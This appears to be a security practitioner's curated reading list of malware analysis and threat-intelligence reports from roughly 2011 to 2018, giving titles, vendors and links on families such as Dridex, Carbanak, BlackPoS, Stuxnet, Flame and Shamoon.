Malware Analysis Reports for Malware Management

    Apr 2018 - Symantec - New Orangeworm attack group targets the healthcare sector in the U.S., Europe, and Asia

      Mar 2018 - FireEye - Exploring the Depths of Cmd.exe Obfuscation and Detection Techniques

      Jan 2018 - MalPedia - Get reports and info on various malware families and their actors - MORE REPORTS

      Dec 2017 - RSA - THE SHADOWS OF GHOSTS INSIDE THE RESPONSE OF A UNIQUE CARBANAK INTRUSION

      Nov 2017 - Minerva Labs - “Emotet goes more evasive

      Oct 2017 - FireEye - Significant FormBook Distribution Campaigns Impacting the U.S. and South Korea

      Oct 2017 - Talos - “Cyber Conflict” Decoy Document Used In Real Cyber Conflict - Latest APT28 attack

      Mar 2017 - Palo Alto - Pulling back the Curtains on EncodedCommand PowerShell Attacks

      Mar 2017 - Symantec - The increased use of PowerShell in Attacks

      Mar 2017 - Kaspersky - From Shamoon to StoneDrill

      Feb 2017 - Kaspersky - Fileless attacks against enterprise networks ( A GREAT reason to do good logging, it would catch this)

      Aug 2016 - SecureWorks - Malware lingers with BITS

      Aug 2016 - Kaspersky - Project Sauron  - Top level cyber-espionage platform covertly extracts encrypted government comms

      Mar 2016 - Fortinet - Dridex's New and Undiscovered Recipes

      Mar 2016 - SANS ISC - Analysis of the Cyber Attack on the Ukrainian Power Grid

      Feb 2016 - FireEye/Mandiant - M-Trends 2016 - Good overview of Mandiant Consulting findings in 2015

      Feb 2016 - TrendLabs - FightPOS get worm routine

      Feb 2016 - InfoSec Institute - PoS Malware:  All you need to know - Good list of many of the PoS malware variants with details

      Jan 2016 - ZScaler - Malicious Office Files Dropping Kasidet and Dridex

      Jan 2016 - Arbor Networks Blog on Uncovering the Seven Pointed Dagger - Trochilus RAT

      Jan 2016 - EmsiSoft Blog on Ransom32 Java cross platform Ransomware

      2015 - F-Secure repo of whitepapers on Advanced Malware (Regin, BlackEnergy, CozyDuke and many others)

      Dec 2015 - HackerHurricane - Dridex Analysis shows tricky shutdown and boot up persistence and how to detect and clean it

      Dec 2015 - Pro PoS, Threat Spotlight: Holiday Greetings from Pro PoS – Is your payment card data someone else’s Christmas present?

      Dec 2015 - Nemesis, Thriving Beyond The Operating System: Financial Threat Group Targets Volume Boot Record

      Nov 2015 - Destover, Toolset linked to Destover Attacker’s arsenal helps them to broaden attack surface

      Oct 2015 - iSight Partners ModPoS: MALWARE BEHAVIOR, CAPABILITIES AND COMMUNICATIONS

      Sept 2015 - PaloAlto Networks - Chinese actors use '3102' malware on attacks of US Governemnt and EU media.  Similar to the '9002' malware of 2014

      Sept 2015 - DrWeb finds MWZLesson POS Malware using parts of older malware

      • http://news.drweb.com/show/?i=9615&lng=en&c=5

      Sept 2015 - IBM Security Shifu Banking Malware attacking Japanese banks

      Aug 2015 - Arbor Networks Blog on Defending the White Elephant - PlugX

      Aug 2015 - Symantec - Regin: Top-tier espionage tool enables stealthy surveillance

      Aug 2015 - SecureWorks - Revealing the Cyber-Kraken - Multiple Verticals

      Aug 2015 - SecureWorks - Threat Group 3390 - Multiple verticals

      July 2015 - FireEye Hammertoss, Cyber Threat Group APT29

      June 2015 - Duqu 2.1 Kaspersky Labs updates their research

      Feb 2015 - Carbanak - Kaspersky The Great bank Robbery

      Aug 2014 - Analysis of Dridex / Cridex / Feodo / Bugat

      Linux:  

      IptabLes/IptabLex (linux)

      • http://blog.malwaremustdie.org/2014/06/mmd-0025-2014-itw-infection-of-elf.html
      • http://storage.pardot.com/9892/121392/TA_DDos_Binary___Bot_IptabLes_v6_US.pdf

      MAC:

      OSXGetShell

      http://www.symantec.com/security_response/writeup.jsp?docid=2013-020412-3611-99&tabid=2
      WINDOWS:

      BackOff - Retail PoS

      https://www.us-cert.gov/ncas/alerts/TA14-212A
      http://blog.trendmicro.com/trendlabs-security-intelligence/new-pos-malware-backoff-targets-us/
      http://www.invincea.com/2014/09/analysis-of-backoff-pos-malware-gripping-the-retail-sector-reveals-lack-of-sophistication-in-malware/
       

      CryptoLocker - Crypto

      http://www.secureworks.com/cyber-threat-intelligence/threats/cryptolocker-ransomware

      https://kc.mcafee.com/resources/sites/MCAFEE/content/live/PRODUCT_DOCUMENTATION/24000/PD24786/en_US/McAfee_Labs_Threat_Advisory_Ransom_Cryptolocker.pdf

      Chewbacca - Retail PoS

      https://blogs.rsa.com/rsa-uncovers-new-pos-malware-operation-stealing-payment-card-personal-information/

      Dexter/Project Hook - Retail Pos

      http://www.arbornetworks.com/asert/wp-content/uploads/2013/12/Dexter-and-Project-Hook-Break-the-Bank.pdf

      BlackPoS/Kaptoxa - Retail PoS

      http://www.securitycurrent.com/resources/files/KAPTOXA-Point-of-Sale-Compromise.pdf (iSight Partners)

      http://blogs.mcafee.com/mcafee-labs/analyzing-the-target-point-of-sale-malware

      https://kc.mcafee.com/resources/sites/MCAFEE/content/live/PRODUCT_DOCUMENTATION/24000/PD24927/en_US/McAfee_Labs_Threat_Advisory_EPOS_Data_Theft.pdf

      http://securityintelligence.com/target-data-breach-kaptoxa-pos-malware/

      Red October

      http://securelist.com/analysis/publications/36740/red-october-diplomatic-cyber-attacksinvestigation/

      http://securelist.com/analysis/36830/red-october-detailed-malware-description-1-first-stage-of-attack/

      SysPrep/Cryptbase.dll Priv Escalation

      http://www.symantec.com/security_response/earthlink_writeup.jsp?docid=2014-050812-0239-99

      The Snake/ Uroburos

      http://info.baesystemsdetica.com/rs/baesystems/images/snake_whitepaper.pdf
      http://www.viruslist.com/sp/analysis?pubid=207271262
      WinNTI (Discovered by us in June 2012 using this methodology)

      http://securelist.com/analysis/internal-threats-reports/37029/winnti-more-than-just-a-game/
      Mandiant APT1

      http://intelreport.mandiant.com/Mandiant_APT1_Report.pdf
      Shady Rat

      http://www.symantec.com/connect/blogs/truth-behind-shady-rat
      Duqu

      http://www.kaspersky.com/about/press/major_malware_outbreaks/duqu
      http://www.secureworks.com/cyber-threat-intelligence/threats/duqu/
      http://www.symantec.com/outbreak/?id=stuxnet
      Stuxnet

      http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_stuxnet_dossier.pdf

      http://www.codeproject.com/Articles/246545/Stuxnet-Malware-Analysis-Paper

      http://www.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf

      https://www.mandiant.com/blog/stuxnet-memory-analysis-ioc-creation/

      Gameover Zeus

      http://www.secureworks.com/cyber-threat-intelligence/threats/The_Lifecycle_of_Peer_to_Peer_Gameover_ZeuS/

      Zues/SpyEye

      http://www.ioactive.com/pdfs/ZeusSpyEyeBankingTrojanAnalysis.pdf

      Gauss

      http://securelist.com/analysis/36620/gauss-abnormal-distribution/

      Mini-Flame

      http://securelist.com/blog/virus-watch/31730/miniflame-aka-spe-elvis-and-his-friends-5/

      SkyWiper/Flame

      http://securelist.com/blog/incidents/34216/full-analysis-of-flames-command-control-servers-27/

      http://www.academia.edu/2394954/Flame_Malware_Analysis

      http://securelist.com/blog/incidents/33002/flame-replication-via-windows-update-mitm-proxy-server-18/

      http://www.crysys.hu/skywiper/skywiper.pdf

      ZeroAccess

      http://nakedsecurity.sophos.com/zeroaccess2/

      http://www.symantec.com/security_response/writeup.jsp?docid=2011-071314-0410-99&tabid=2

      Shamoon

      http://securelist.com/blog/incidents/57854/shamoon-the-wiper-copycats-at-work/

      http://securelist.com/blog/incidents/57784/shamoon-the-wiper-further-details-part-ii/

      Wiper

      http://www.secureworks.com/cyber-threat-intelligence/threats/wiper-malware-analysis-attacking-korean-financial-sector/